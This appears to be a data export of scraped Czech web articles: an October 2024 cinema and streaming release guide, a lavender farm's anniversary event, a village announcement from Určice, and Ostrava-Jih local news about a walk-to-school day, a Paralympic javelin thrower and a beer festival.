Netflix Fanoušci neohrožené a hbité archeoložky z Anglie , zbystřete! Netflix uvede animovaný seriál jménem Tomb Raider: The Legend of Lara Croftm který se bude odehrávat po událostech herní Survivor trilogie od společnosti Crystal Dynamics . Lara s hlasem Hayley Atwell se bude muset vrátit zpět domů poté, co byl z jejího domova ukraden mocný a nebezpečný čínský artefakt. Viník je zloděj, který má na hrdinku až podivnou osobní vazbu. Lařino pronásledování se tak změní v napínavé dobrodružství kolem světa, během kterého samozřejmě zavítá do několika zapomenutých hrobek. Následně ale bude nucena konfrontovat své pravé já a rozhodnout se, jakou hrdinkou se vlastně chce stát. V seriálu se nám představí i další postavy, které fanoušci slavné franšízy bezpochyby poznají. Jmenovitě se vrací Jonah, který se objevil ve všech třech výše zmíněných hrách ze Survival trilogie. Taktéž by se měl vrátit na scénu počítačový expert Zip, který Laře pomáhal především v herním titulu Tomb Raider: Legend (2006). Na Netflixu od 10. října. Citadel: Diana - Prime Video Pokud se vám líbil seriál Citadel a přejete si ze špionského světa vidět více, tak se nemusíte vůbec bát. Amazon chce na základně seriálu vybudovat novou velkou franšízu, kterou rozšíří nejenom druhá řada, ale také několik spin-offů. Jedním z nich bude italská série Citadel: Diana. Děj nás zavede do Milána roku 2030. Před osmi lety byla nezávislá špionážní agentura Citadel zničena mocným nepřátelským syndikátem známým jako Manticore. Od té doby Diana Cavalieri, osamocená agentka Citadely, představitele zmíněného syndikátu tajně špehuje, ovšem zároveň tím uvízne v pasti. Jednoho dne se ale naskytne příležitost, díky které by mohla konečně uniknout. Tu bude představovat ten nejnepravděpodobnější spojenec jménem Edo Zani, jehož otcem je Ettore, šéf italského syndikátu. Na službě Prime Video od 10. října 2024. Transformers Jedna - Kino Brzy dorazí do kin zřejmě nejlepší celovečerní titul o Transformerech za posledních několik let. Alespoň to tak vypadá podle dosavadních recenzí, které nešetří chválou. Transformers Jedna má být parádní podívanou, která se podle všeho stane chloubou celé franšízy. Děj se bude odehrávat na planetě Cybertron, která je domovem Autobotů i Deceptikonů. Jednou z hlavních postav se stává jak Optimus Prime, který byl tehdy znám jako Orion Pax, tak i jeho budoucí velký rival Megatron, jenž se zas nazýval D-16. Než se však oba dva stali zapřisáhlými nepříteli, byli z nich dobří braši, kteří budou muset spojit síly proti tajemné hrozbě, jež začne jejich domov ohrožovat. Dočkají se ale pomoci nejenom od hračičky Bumblebee, ale i drsňačky Elity. Společně tak budou muset putovat do míst, kde se jejich planeta zrodila. A to do skrytého koutu světa, kde se střetnou s dávným válečníkem Alpha Trionem. Díky němu se hrdinové konečně naučí libovolně transformovat. V kinech od 10. října. Substance - Kino Na letošním filmovém festivalu v Cannes zabojoval v Hlavní soutěži chválený body-horor Substance s Demi Moore v hlavní roli, který napsala a natočila francouzská filmařka Coralie Fargeat. Příběh se zaměří na stárnoucí televizní hvězdu Elisabeth Sparkle, které se naskytne příležitost vyzkoušet jistou zázračnou a buňky replikující substanci. Díky ní se člověk znovuzrodí - mladší, krásnější a obecně dokonalejší. Však každý z nás touží po lepší verzi sebe sama, ne? Představa to je natolik úžasná, že to samozřejmě bude mít jeden zásadní háček. Po použití se bude muset dělit o čas. Jeden týden pro svou původní verzi, další zas pro své zlepšené já jménem Sue. Žádné výjimky nejsou povoleny, půjde tak o dokonalou rovnováhu. Co by se jen mohlo pokazit, že? Těšit bychom se měli na hrůznou, zábavnou a nelítostně satirickou podívanou, která obrací kulturu toxické krásy naruby. V kinech od 10. října. Lee : Fotografka v první linii - Kino Do kin zamíří i poněkud nenápadný snímek z období druhé světové války jménem Lee , ve kterém si oscarová Kate Winslet zahraje slavnou americkou fotografku Elizabeth Lee Miller . Ta ve 20. letech začínala jako modelka pro magazín Vogue, přičemž ze začátku se nám ukáže ještě v době, kdy v roce 1938 tráví se svými nejbližšími přáteli dovolenou v jižní Francii . Když pak celá Evropa začne čelit Hitlerově zlu, z Lee Miller , která měla hluboké porozumění a empatii pro ženy a pro oběti války, se tak stává válečná korespondentka. Velice ikonickou se tak například stane fotografie, kterou pořídila v Hitlerově vaně. film se zaměří na její život během války a dokumentování válečných zločinů. Dočkáme se také jejího honu za pravdou, za což zaplatila obrovskou osobní cenu a přinutilo ji to čelit traumatickému a hluboko pohřbenému tajemství z dětství. Kate Winslet projekt z velké části financovala z vlastní kapsy, tak doufejme, že se setká s úspěchem. V kinech od 10. října. 2024. 11. ŘÍJNA Dokonalý cizinec - Apple TV+ Slavný mexický režisér Alfonso Cuarón nám po letech nadělí svou další podívanou, tentokrát se bude jednat o minisérii jménem Dokonalý cizinec, kterou nabídne službě Apple TV+. Děj tohoto psychologického thrilleru bude sledovat úspěšnou a respektovanou televizní a dokumentární žurnalistku Catherine Ravenscroft, jejíž práce je založená na odhalování skrytých prohřešků velkých a známých institucí. Když se ale na svém nočním stolku jednoho dne objeví poutavý román od jistého vdovce, tak se zděsí, protože zjistí, že je v něm hlavní postavou. A to v příběhu o její minulosti, kterou považovala za dávno pohřbenou. Zatímco se Catherine snaží odhalit spisovatelovu skutečnou identitu, je nucena čelit své minulosti. Bude si ale muset pospíšit, jinak jí tato lapálie zničí nejenom život, ale i vztahy s manželem Robertem a jejich synem Nicholasem. Na službě Apple TV+ od 11. října. 17. ŘÍJNA Brothers - Prime Video Max Barbakow, režisér příjemné a nápadité komedie Palm Springs, nám tento měsíc nadělí svůj druhý celovečerák jménem Brothers, ve kterém v hlavních rolích uvidíme Joshe Brolina a Petera Dinklage. Jednou z předních postav se stává Moke, napravený zločinec, který se snaží žít si spořádaným životem. Do toho však hodí vidle jeho bratr Jady, který plánuje životní loupež. Na oba dva tak čeká cesta, při níž musí zhojit své rodinné pouto, aby se pak navzájem nezabili, zároveň ale budou muset unikat kulkám, zákonu a i jejich panovačné matce. Z traileru to vypadá na standardní akční komedii, kterou jste už viděli tisíckrát, ale obsazení je sympatické a Barbakow je schopný filmař. Tak třeba to bude stát za to. Na službě Prime Video od 17. října. Ze stínů - Netflix Timo Tjahjanto, zkušený indonéský filmař, který se stal režisérem chystaného pokračování zábavného akčňáku Nikdo, nám představí svůj nový celovečerní nářez jménem Ze stínu. Hlavní hrdinkou se stává sedmnáctiletá a od minulosti oproštěná nájemná vražedkyně s přezdívkou Codename 13, která pracuje pro tajnou skupinu zabijáků jménem The Shadow. Jednoho dne je ale vyslána na misi v Japonsku , která se zvrtne. Její mentorka Umbra ji proto pošle do Indonésie , kde má být potrestána. Ve slumech Jakarty se ale následně rozhodne zachránit malého jedenáctiletého chlapce jménem Monji, kterému místní zločinecké gangy zabily matku. Záchranná mise ale bude znamenat, že se mladá vražedkyně postaví nejenom své mentorce, ale také celé zabijácké organizaci. Na Netflixu od 17. října. Megalopolis - Kino Velkolepé a velice rozporuplně přijímané podívané jménem Megalopolis od legendárního Francise Forda Coppoly , která nás zavede do futuristické verze New Yorku , se dočkáme už tento měsíc. Jistá nehoda zničí metropoli podobnou New Yorku , která už se nějakou dobu nacházela v rozkladu. Na scénu proto přichází Cesar Catilina, idealistický architekt, který si umane město přestavět na přetrvávající příklad utopie. Nicméně zkorumpovaný a ctižádostivý starosta Franklyn Cicero má zcela jiné plány. Mezi oba dva muže a jejich odlišné vize vstoupí Franklynova sociálně založená dcera Julia, která je již unavená z pozornosti a moci, se kterou se narodila, v rámci čehož hledá svůj smysl života. Coppola si asi 120milionový rozpočet zaplatil ze svého tím, že prodal části svých vinic. Jedná se o jeho vysněný projekt, na němž začal pracovat už v roce 1983. Podle dosavadních reakcí se nebude jednat o film pro každého. V kinech od 17. října. Úsměv 2 - Kino Říká se, že s úsměvem jde všechno lépe. V případě pokračování úspěšného hororu Úsměv to však bude poslední věc, kterou byste chtěli vidět. Tentokrát se děj zaměří na světově proslulou pop-hvězdu Skye Riley, která se chystá vyrazit na nové turné. Když ale před ní její k smrti vyděšený kamarád Lewis spáchá s úsměvem na tváři sebevraždu, Skye tak rázem začne čelit strašlivé kletbě, která má za několik dní skončit její smrtí. Stane se tak svědkem děsivých a nevysvětlitelných událostí, kvůli kterým bude nucena čelit své temné minulosti, aby mohla znovu získat kontrolu nad svým životem. Z trailerů to vypadá na dost podobnou podívanou, kterou byla i jednička, ale podle režiséra Parkera Finna se bude pokračování od svého předchůdce výrazně lišit. V kinech od 17. října. 23. ŘÍJNA Vlkodlaci z Temného hvozdu - Netflix Pokud máte rádi francouzské komedie a Jean Reno patří mezi vaše oblíbené herce, můžete dát příští měsíc šanci dobrodružnému snímku jménem Vlkodlaci z Temného Hvozdu. Film bude vycházet ze stejnojmenné hry pro větší skupiny hráčů, která funguje v podstatě na stejném principu jako „Městečko Palermo “. Zvolí se vypravěč, který celou hru vede, a posléze větší skupina vesničanů a menší skupinka vlkodlaků. Vlkodlaci po nocích zabijí vesničany, ti se zas během dne dohadují o tom, kdo by mohl být vlkodlak. Ve filmu se hlavními hrdiny stanou členové rodinky, kteří se skrze tajemnou hru přemístí do vesnice na konci 15. století. Aby se mohli dostat zpátky domů, budou si muset zmíněnou hru vyzkoušet na vlastní kůži. Je proto třeba najít všechny vlkodlaky a zlikvidovat je. Na Netflixu od 23. října. 24. ŘÍJNA Like a Dragon: Yakuza - Prime Video Předělávek her na seriály není nikdy dost. A liveaction adaptace neberou konce. Ovšem tentokrát se do těchto temných vod pouští série Yakuza. Seriál ponese jméno Like a Dragon: Yakuza a zaměří se na život Kazumy Kiryua, kterého ztvární Ryoma Takeuchi. Ten se po deseti letech konečně dostal z vězení za něco, co neudělal, přičemž jeho cíl je jasný. Jde najít peníze, staré přátele a ve městě Kamurocho se pořádně porve. Celkově by seriál měl pokrýt úplně první hru Yakuzy, hlavně se můžeme těšit na pořádnou gangsterskou rvačku. Na Prime video od 24. října. Venom: Poslední tanec - Kino Letošní Madam Web žádným kinematografickým zázrakem rozhodně nebyla, ale studio Sony má v rámci svých marvelovek stále ještě šanci se vykoupit. Ke konci příštího měsíce totiž dorazí do kin třetí a závěrečný díl Venoma, který ponese podtitul Poslední tanec. Opět se tak můžeme těšit na návrat Eddiho Brocka a jeho zubatého symbiontského kámoše, se kterým už zažil mnohé. V nadcházejícím díle ale budou oba čelit té největší hrozbě, která může pro oba skončit katastrofálně. Po Eddiem i Venomovi totiž půjdou představitelé obou jejich světů. A jak se smyčka utahuje, oba dva neobvyklí přátelé budou muset učinit zničující rozhodnutí, které vyústí v jejich poslední společný tanec. Ve filmu se mimo jiné objeví i Knull, prastarý král v černém a ztělesnění temnoty a prázdnoty, který je Venomovým stvořitelem. V kinech od 24. října. 25. ŘÍJNA The Remarkable Life of Ibelin - Netflix Život je občas krutý. A v případě Matse Steena obzvlášť. To nám ukáže dokument The Remarkable Life of Ibelin. Tento chlapec trpěl svalovou distrofií, kvůli čemuž se jeho život rapidně měnil. Čím dál více času trávil před obrazovkou, přičemž jeho rodiče jej litovali, jelikož si mysleli, že chlapec si nikdy nenajde přátele, nezažije normální věci a nenajde si lásku. Po chlapcově smrti se jeho rodičům začínají ozývat přátele ze hry World of Warcraft, v rámci čehož zjišťují, že chlapec upoutaný na vozíku žil zajímavý skrytý život ve hře. Na Netflixu od 25. října. 31. ŘÍJNA The Apprentice: Příběh Trumpa - Kino Nyní něco trochu více… kontroverznějšího. Drama The Apprentice: Příběh Trumpa si posvítí na mladší léta známého podnikatele a bývalého prezidenta Spojených států . Snímek by se tak měl zaměřit nejenom na to, kterak se Donald Trump v podání Sebastiana Stana dostal k moci, ale především si posvítí na jeho vztah s vlivným pravicovým právníkem Royem Cohnem během 70. a 80. let, stejně tak se zaměří na další důležité postavy v Trumpově životě, například na československou rodačku Ivanu. Film měl dlouhou dobu problém najít distributora v USA . A to nejenom z toho důvodu, že kvůli němu byli rozlícení lidé z Trumpovy volební kampaně. I přestože některé sekvence slavného podnikatele nevykreslují v příliš dobrém světle, údajně nemá jít o vyloženě „proti trumpovský“ film. Snímek podle všeho jasně vyzdvihuje jeho úspěchy a snaží se, aby s ním diváci sympatizovali. V kinech od 31. října. Anora - Kino Tvorba amerického filmaře Seana Bakera není v našich končinách příliš známá, ale rozhodně stojí za vaši pozornost. Jeho poslední dva filmy The Florida Project a Red Rocket jsou velice poutavými sociální dramaty se špetkou komedie, které by mohly bavit i mainstreamového diváka. Děj bude sledovat Anoru, mladou uzbecko-americkou prostitutku z Brighton Beach, rusofonní enklávy v New Yorku . A jelikož ruštinu sama trochu ovládá, její šéf ve striptýzovém klubu ji pošle k ruskému klientovi. Setkává se tak se synem oligarchy, za něhož se po dobrodružství plném sexu, drog a alkoholu následně zbrkle provdá. Jejich pohádkové manželství je ale následně ohroženo poté, co rodiče mladého Rusa dorazí do New Yorku , aby mohli sňatek anulovat. V kinech od 31. října. A to je všechno! Na které ze zmíněných titulů se nejvíce těšíte? Nebo je zde nějaké jiné dílo, které nebylo zmíněno, případně jej nevidíte v tabulce? Dejte nám vědět do komentářů! Zdroj: Columbia Pictures Kolem tajemného Spielbergova filmu o UFO krouží další herci Datuum Titul Distribuce 3.9. Heartstopper 3. sezóna Netflix The Bad Guys: Haunted Heist Netflix Blue Box Netflix House of Spoils Prime video Hold Your Breath Disney+ Velký Pán Kino Ještě nejsem, kým chci být Kino Buffalo Kids Kino 4.10. It’s What’s Inside Netflix The Platform 2 Netflix 5.10. Starting 5 Netflix Ranma 1/2 Netflix 6.10. The Franchise Max 10.10. Caddo Lake Max Boku no Hero Academia the Movie 4: You're Next Kino Semínko posvátného fíkovníku Kino Rok vdovy Kino Malý velký pes Kino Sabaton - The Tour to End All Tours Kino 17.10. Gundam: Requiem for Vengeance Netflix 24.10. Canary Black Prime video Venom: Poslední tanec Kino 200% Vlk Kino Bambi: Příběh z lesů Kino 31.10. Moje kouzelná rodinka Kino Autor: Nikola Levová Autor person Nikola Levová Rubrika transition_slide Novinky</t>
  </si>
  <si>
    <t>9820</t>
  </si>
  <si>
    <t>6550</t>
  </si>
  <si>
    <t>20241001_9_2997931005_409c26b7ff5da5c609bc.html</t>
  </si>
  <si>
    <t>409c26b7ff5da5c609bc</t>
  </si>
  <si>
    <t>Oslava 10 let Levandulového statku Bezděkov</t>
  </si>
  <si>
    <t>Oslava 10 let Levandulového statku Bezděkov V říjnu to bude přesně 10 let od vysazení první levandule na Levandulovém statku v Bezděkově a bude oslava! Levandulový statek vás zve na své 10. narozeniny do Bezděkova v sobotu 12. října od 10 hodin. Užijte si den na statku s rodinou a oslavte toto kulaté výročí s majiteli. Vstupné dobrovolné. “Právě před deseti lety přišlo to rozhodnutí o změně na našem statku. Namísto brambor, řepy a obilí jsme začali sázet na naše pole levandule. V roce 2014 jsme jich tehdy vysadili prvních 500 a dnes jich máme už kolem 40 000,” popisuje zakladatel levandulového pole Lukáš Drlík. Levandulové pole se bude rozšiřovat i v den oslavy, 500 návštěvníků si symbolicky bude moct zasadit svou vlastní levanduli. “Návštěvníci, kteří budou chtít zasadit, si mohou přinést vlastní cedulku, kterou si k levanduli dají a poznají si ji každou sezónu,” dodává Drlík. Na místě budou sazenice i k prodeji. Po celý den na statku bude hrát také živá hudba. Na gastro nabídce budou oblíbené grilované makrely, levandulové klobásy, špekáčky, brambory v ohni a levandulová bábovka. Proudem poteče Levandulový Švihák, levandulový cider i pivo ! Dětem nabídnou bylinkový čaj, levandulovovu limonádu nebo horké levandulové kakao se šlehačkou. Statek nabízí spoustu místa na pouštění draků. “Vyzýváme proto rodiče, aby si s dětmi donesly draky, které budeme pouštět k nebi. Budeme vyhlašovat toho nejhezčího, který získá odměnu,” prozrazuje Drlík. Děti si budou moci tvořit v kreativních dílničkách, svézt se na koni a uvidí spoustu zvířátek na statku. O zážitky nebude nouze. Bezděkov má 72 obyvatel, ovšem během kvetoucí levandulové sezóny – od června do července – se počet návštěvníků některé dny zvyšuje i na tisíce, a to především během každoročního Levandulového festivalu. Za celou letní sezónu Levandulový statek Bezděkov odhadem navštíví 15 000 až 20 000 návštěvníků ze všech koutů České republiky i ciziny. Počasí: dnes 15 °C Rychlost větru: 8 m/s Oblačnost: 100 % Tlak: 1004 hPa Vlhkost: 80 % Rychlost větru: 7 m/s Oblačnost: 100 % Tlak: 997 hPa Vlhkost: 81 % Rychlost větru: 4 m/s Oblačnost: 83 % Tlak: 1013 hPa Vlhkost: 64 % Rychlost větru: 3 m/s Oblačnost: 79 % Tlak: 1022 hPa Vlhkost: 64 % Rychlost větru: 9 m/s Oblačnost: 100 % Tlak: 1010 hPa Vlhkost: 72 % Rychlost větru: 7 m/s Oblačnost: 24 % Tlak: 1023 hPa Vlhkost: 61 % Rychlost větru: 2 m/s Oblačnost: 6 % Tlak: 1026 hPa Vlhkost: 61 % Rychlost větru: 4 m/s Tlak: 1025 hPa Vlhkost: 59 % &amp;lt; &amp;gt; Kudy z nudy přináší aktuální tipy na víkendové zážitky (12.10. – 13.10.). Na jediném místě najdete tipy na akce ze všech krajů a regionů České...</t>
  </si>
  <si>
    <t>20241001_90_2995905019_2bc62c225518d78d5927.html</t>
  </si>
  <si>
    <t>2bc62c225518d78d5927</t>
  </si>
  <si>
    <t>Hlášení 1.10. 2024</t>
  </si>
  <si>
    <t>Shrnutí Hlášení 1.10. 2024 Pojízdná prodejna ROSNIČKA oznamuje občanům, že do naší obce se svojí prodejnou přijede ve ČTVRTEK 3. 10. 2024 v 11.30 hod na obvyklé místo u obchodu a v čase 11.50 horní část obce "zastávka u studny" a bude prodávat obvyklý sortiment krmiv pro domácí a hospodářská zvířata, drogistické potřeby a základní potraviny. Sdružení kominíků a topenářů Bude provádět v naší obci v NEDĚLI dne 6.10. požadované kontroly a čištění komínů dle zákonu č. 34/2016 Sb. za 450 Kč, čištění plynových kotlů za 450 Kč a revize kotlů na tuhá paliva za 1.100,- Kč. Dále nabízí vložkování a frézování komínů. Zájemci se mohou objednat telefonicky na telefonním čísle: 608 748 989 Obecní úřady Alojzov , Dětkovice , Myslejovice, Seloutky a Určice pořádají 22. Setkání seniorů v sobotu 12. října od 15:00 hodin v kulturním domě v Křenůvkách. V hlavním programu vystoupí hvězdné duo z 80 let " KAMÉLIE. " Svoz pro naše občany je ve 14:20 hod. od zastávky v městečku, ve 14: 25 hod. od zastávky u hřbitova a 14: 40 hod. od zastávky u studených. Občerstvení a tombola je zajištěno, srdečně vás zvou pořadatelé. Obecní úřad společně s místními hasiči vás srdečně zve na Dětskou drakiádu spojenou s vysvěcením nové zvoničky s ochutnávkou moravských vín v neděli 13. října 2024 od 14:00 hodin v lokalitě Větřák u zvoničky. Pro děti mají hasiči připravené soutěže, občerstvení a skleničky na víno s sebou. Obecní úřad vstupenky na zábavný pořad – travesti show Divoké kočky Prodej vstupenek v knihovně na obecním úřadě vždy v úřední dny – úterý a ve čtvrtek. Celovečerní zábavný program se uskuteční v pátek 8. listopadu 2024, začátek v 19:00 hodin v místní sokolovně. Vstupné v předprodeji 250,- Kč. Publikováno: 1. 10. 2024 16:48 Adresa Určice 81 798 04 Určice +420 582 357 130 podatelna@urcice.cz Sledujte nás! Pracovní doba a úřední hodiny Pondělí 7:00 - 12:00 13:00 - 16:00 Úterý 7:00 - 12:00 13:00 - 17:00 (úř. hodiny) Středa 7:00 - 12:00 13:00 - 16:00 Čtvrtek 7:00 - 12:00 13:00 - 17:00 (úř. hodiny) Pátek 7:00 - 12:00 Autor: Antee s.r.o.</t>
  </si>
  <si>
    <t>68</t>
  </si>
  <si>
    <t>79</t>
  </si>
  <si>
    <t>20241001_91_2995783485_125736b99dc28c601b3f.html</t>
  </si>
  <si>
    <t>125736b99dc28c601b3f</t>
  </si>
  <si>
    <t>Expres Ostrava-Jih</t>
  </si>
  <si>
    <t>Expres Ostrava -Jih Zpravodajství z obvodu Ostrava -Jih od redaktorky Andrey Holeszové a kameramana Petra Macury Děti se vydaly pěšky do školy v rámci celostátní akce Oštěpařka reprezentovala Česko na paralympiádě Svatováclavské slavnosti piva na Zámku Zábřeh Děti se vydaly pěšky do školy v rámci celostátní akce Děti z mateřských a základních škol po celé Ostravě se vydaly do školy pěšky, na koloběžce či na kole. Již po osmé se totiž konala celonárodní podzimní výzva, jejímž cílem je zvýšit počet žáků, které přijdou do školy po svých, a tím i snížení počtu aut v blízkosti škol. Nechyběly ani školy z obvodu. Pěšky do školy. Takto se nazývá celonárodní projekt základních a mateřských škol v Česku. Účast škol v Ostravě bývá každoročně početně rekordní. Například ZŠ Dvorského se akce účastnila již počtvrté. Michaela Machalová, učitelka, ZŠ Dvorského : „Je to akce, která se zaměřuje na prevenci různých jevů, ať už to je uvolnění dopravy u škol, bezpečnost, samozřejmě motivace ke zdraví a nějaké stmelení kolektivu.“ Rodiče s menšími dětmi by měli trasu nejprve projít a upozornit je na dopravní úskalí a nebezpečí, například přechody přes silnici. Letos se v Hrabůvce za deště vycházelo od Pizzerie Anna a od workoutového hřiště. Michaela Machalová, učitelka, ZŠ Dvorského : „Dneska je účast trochu slabší kvůli podmínkám, které musíme dneska vydržet, ale máme tady skvělé držáky, studenty, kteří přišli i za těchto podmínek a doufáme, že na ostatních stanovištích uvidíme více dětí.“ anketa, účastníci akce : „Jako škola se toho zúčastňujeme pravidelně, děláme různé fotky na weby a já chodím hodně často pěšky do školy.“ – „A máte to daleko?“ – „Ani ne, mám to kousek.“ anketa, účastníci akce : „Já chodím pěšky normálně tady od toho hřiště každý den.“ – „A jak dlouho to zabere?“ – „Když jdu rychle, tak kolem dvou až pěti minut.“ anketa, účastníci akce : „Já tady taky bydlím, tak já taky chodím do školy takhle rychle, ale ještě chodím za kamarádkou, která bydlí tam vzadu, takže chodím i za ní a dohromady nám to trvá tak 10 minut.“ Cestu s žáky letos absolvoval i starosta obvodu. Martin Bednář (ANO), starosta MOb Ostrava-Jih : „Jsem zastánce toho, aby děti chodily do školy pěšky. Je to možná dáno tím, že já jsem do všech svých základních škol chodil pěšky, vždycky jsem zažil nějaké dobrodružství, s někým jsem se potkal a bylo to takové zdravější, v tuto chvíli i ekologičtější, takže jsem podpůrce této akce.“ Děti, které dnešní deštivou cestu zvládli přivítal školní maskot. Miloš Kosík , ředitel, ZŠ Dvorského : „Domníváme se, že pěšky do školy je krásná událost. V podstatě v dnešním provozu je umění do školy přijít právě pěšky. Snažíme se motivovat děti i rodiče, aby alespoň jednou do roka přišli takto.“ V loňském roce se do výzvy přihlásilo na 439 škol z 270 obcí a zúčastněných každoročně přibývá. V rámci Ostravy to bylo 111 tříd z 22 škol. --- Oštěpařka reprezentovala Česko na paralympiádě Oštěpařka Miroslava Obrová si na letošní paralympiádě v Paříži vybojovala krásné 11. místo. Za reprezentaci České republiky na prestižní soutěži ji přijel na vítkovický stadion, kam jezdí trénovat, poděkovat i místostarosta Radim Ivan. Život se jí navždy změnil v roce 2009. Miroslava Obrová, máma tehdy devítiletého syna, přišla o obě nohy, když ji srazil vlak. Ke sportu ji poté přivedla náhoda. Miroslava Obrová, paraatletka : „Jela jsem na výstaviště se podívat na nějakou výstavu pomůcek pro handicapované, jeřábků na nakládání do auta a podobně. Tam jsem potkala jednu paraatletku, která se mě zeptala, jestli nechci zkusit atletiku.“ Po pár týdnech se už účastnila prvních soutěží a nyní drží české rekordy v hodu oštěpem, diskem i koulí. Letos reprezentovala Českou republiku na paralympiádě v Paříži . Miroslava Obrová, paraatletka : „Když byla paralympiáda v Tokiu před třemi lety, tak už to tam bylo takové na hraně, že bych mohla jet, ale nesplnila jsem nějaké kvóty a tak jsem jet nemohla, ale v tu chvíli mě to nakoplo k tomu, že bych se určitě chtěla někam jet podívat, ať už do Paříže nebo do LA, to mi bylo jedno ale prostě jsem do toho ty 4 roky dávala nejvíc.“ Skončila na jedenáctém místě mezi nejlepšími oštěpařkami světa. Miroslava Obrová, paraatletka : „Byla jsem na 4 mistrovstvích světa, na mistrovství Evropy , na světových pohárech, nesčetně na závodech, ale tohle bylo zase něco úplně jiného. Ty závody, co jsem jezdila doposud byly vždy pouze atletické, tak znám pouze ty handicapované atlety. A když vidíte, že střílí lukem nohama, plavci plavou ber ruk, to mi tady v té atletice takové handicapy nemáme, takže to bylo takové, že člověk přišel zase do úplně jiného světa a řekl si, že na tom vlastně ještě není tak špatně, protože ty handicapy jsou různé. No a ta atmosféra 80 tisíc lidí, nabitý stadion, lidi jásali, řvali, fandili, to si nikdo nedokáže představit tu atmosféru.“ Za skvělou reprezentaci na paralympiádě ji přijel na vítkovický stadion, kam jezdí pravidelně trénovat, poděkovat i místostarosta obvodu Ostrava -Jih Radim Ivan. Radim Ivan ( ODS ), místostarosta MOb Ostrava-Jih : „Já obdivuju všechny tyhle lidi, protože se i přes ten handicap do něčeho vrhnou. Tady s paní jsme se bavili, že do toho vletěla až někdy v 38 letech, našla nový smysl života a to je skvělé a myslím si, že jako společnost bychom měli tyto sportovce nějakým způsobem podporovat a velké poděkování patří i klubu SSK Vítkovice, že se těmto sportovcům věnují.“ Letos Miroslavu Obrovou letos čeká ještě jedna soutěž, a to na domácí půdě ve Vítkovicích . Chtěla by se ale zúčastnit i příští paralympiády v LA. --- Svatováclavské slavnosti piva na Zámku Zábřeh Zábřežský zámek už po sedmnácté hostil Svatováclavské slavnosti piva . Účastníci akce měli možnost vyzkoušet piva z 30ti českých mini-pivovarů. Program byl doplněn také o hry a zábavu pro děti, hudební kapely a charitativní čepování. Průvodem a přípitkem Sv. Václava na minulost i budoucnost odstartovaly v pátek Svatováclavské slavnosti piva . V areálu zábřežského zámečku se akce konala již po sedmnácté. Gabriela Gödelová, ředitelka Kulturního zařízení Ostrava-Jih : „Věřím, že každoročně trochu zvedáme tu úroveň, jak z hlediska programu, tak z hlediska nabídky těch minipivovarů. Těch je tu mimochodem 30 a ta nabídka je opravdu pestrá a je těžké si vybrat.“ Roman Puchálka, Minipivovar Beerokracie : „Máme určitě nějaké ovocné piva , které jsou spíš pro dámy, ale pánové si taky dají. Máme hodně dobrou sezónní jipu a klasický hořký ležák.“ René Binar, Minipivovar Slezan : „Máme 18 Svatováclavský speciál, který zraje tři měsíce, máme zázvorové, máme spodně kvašenou citru, takže každý si musí najít svoje.“ Pivo mohou návštěvníci slavností nejen ochutnávat, ale také hlasovat pro minipivovar, který je svým zlatavým mokem potěšil nejvíce. anketa, návštěvníci akce : „Zatím jsme ochutnali ze starobělského pivovaru ležák, ten je výborný, protože jsem tam byl i na exkurzi, tak vím do čeho jdu a předtím jsme zkusili z karlovického pivovaru z Velkých Karlovic , a tak taky měli úžasné pivo , takže můžu doporučit.“ anketa, návštěvníci akce : „Já tomu vůbec nerozumím, ale nechávám se vést zkušenějším a je to docela zajímavé. Měli jsme jen 2 piva , tak zatím to nedokážu posoudit, ale je to dobré.“ Kromě bohatého hudebního doprovodu byl připraven i program pro děti. Klára Šídlová, pedagožka, Středisko volného času Ostrava - Zábřeh : „Dneska jsme si ve spolupráci s kulturou Ostrava -Jih připravili stanoviště, máme tady air-brush tetování, což je tetování nástřikem, které dětem vydrží 3-10 dnů. Dále máme papírové dílničky, kde si děti vyrábí koníky, princezny prince a veškeré dobové věci ke sv. Václavu, malování na obličej a také dřevěné hry nebo fotokoutek pro děti i dospělé.“ Součástí programu bylo i tradiční charitativní čepování. Gabriela Gödelová, ředitelka Kulturního zařízení Ostrava-Jih : „Kromě toho, že se tady lidé dneska přišli bavit, tak je to také o pomoci, jako vždy tady máme sbírku – navazujeme na akci Běh pro a letos vybíráme peníze a čepujeme pivo za dobrovolnou cenu pro Isabelku, která je tady z Jihu a potřebuje peníze na rekonvalescenci a fyzioterapii a kromě toho v návaznosti na ty nešťastné události minulých dnů, jsme se rozhodli dát také sbírku na naše sousedy z Nové Vsi, kteří potřebují finančně podpořit, aby si mohli opravit své obydlí zničené povodněmi.“ Ti, co místo piva preferují víno , si přijdou na své hned další víkend a to na hrabůvkovském náměstí v rámci akce Jih žije vínem . --- Děti z mateřských a základních škol po celé Ostravě se vydaly do školy pěšky, na koloběžce či na kole. Již po osmé se totiž konala celonárodní podzimní výzva, jejímž cílem je zvýšit počet žáků, které přijdou do školy po svých, a tím i snížení počtu aut v blízkosti škol. Nechyběly ani školy z obvodu. Michaela Machalová, učitelka, ZŠ Dvorského : „Je to akce, která se zaměřuje na prevenci různých jevů, ať už to je uvolnění dopravy u škol, bezpečnost, samozřejmě motivace ke zdraví a nějaké stmelení kolektivu.“ Michaela Machalová, učitelka, ZŠ Dvorského : „Dneska je účast trochu slabší kvůli podmínkám, které musíme dneska vydržet, ale máme tady skvělé držáky, studenty, kteří přišli i za těchto podmínek a doufáme, že na ostatních stanovištích uvidíme více dětí.“ anketa, účastníci akce : „Jako škola se toho zúčastňujeme pravidelně, děláme různé fotky na weby a já chodím hodně často pěšky do školy.“ – „A máte to daleko?“ – „Ani ne, mám to kousek.“ anketa, účastníci akce : „Já chodím pěšky normálně tady od toho hřiště každý den.“ – „A jak dlouho to zabere?“ – „Když jdu rychle, tak kolem dvou až pěti minut.“ anketa, účastníci akce : „Já tady taky bydlím, tak já taky chodím do školy takhle rychle, ale ještě chodím za kamarádkou, která bydlí tam vzadu, takže chodím i za ní a dohromady nám to trvá tak 10 minut.“ Martin Bednář (ANO), starosta MOb Ostrava-Jih : „Jsem zastánce toho, aby děti chodily do školy pěšky. Je to možná dáno tím, že já jsem do všech svých základních škol chodil pěšky, vždycky jsem zažil nějaké dobrodružství, s někým jsem se potkal a bylo to takové zdravější, v tuto chvíli i ekologičtější, takže jsem podpůrce této akce.“ Miloš Kosík , ředitel, ZŠ Dvorského : „Domníváme se, že pěšky do školy je krásná událost. V podstatě v dnešním provozu je umění do školy přijít právě pěšky. Snažíme se motivovat děti i rodiče, aby alespoň jednou do roka přišli takto.“ Oštěpařka Miroslava Obrová si na letošní paralympiádě v Paříži vybojovala krásné 11. místo. Za reprezentaci České republiky na prestižní soutěži ji přijel na vítkovický stadion, kam jezdí trénovat, poděkovat i místostarosta Radim Ivan. Miroslava Obrová, paraatletka 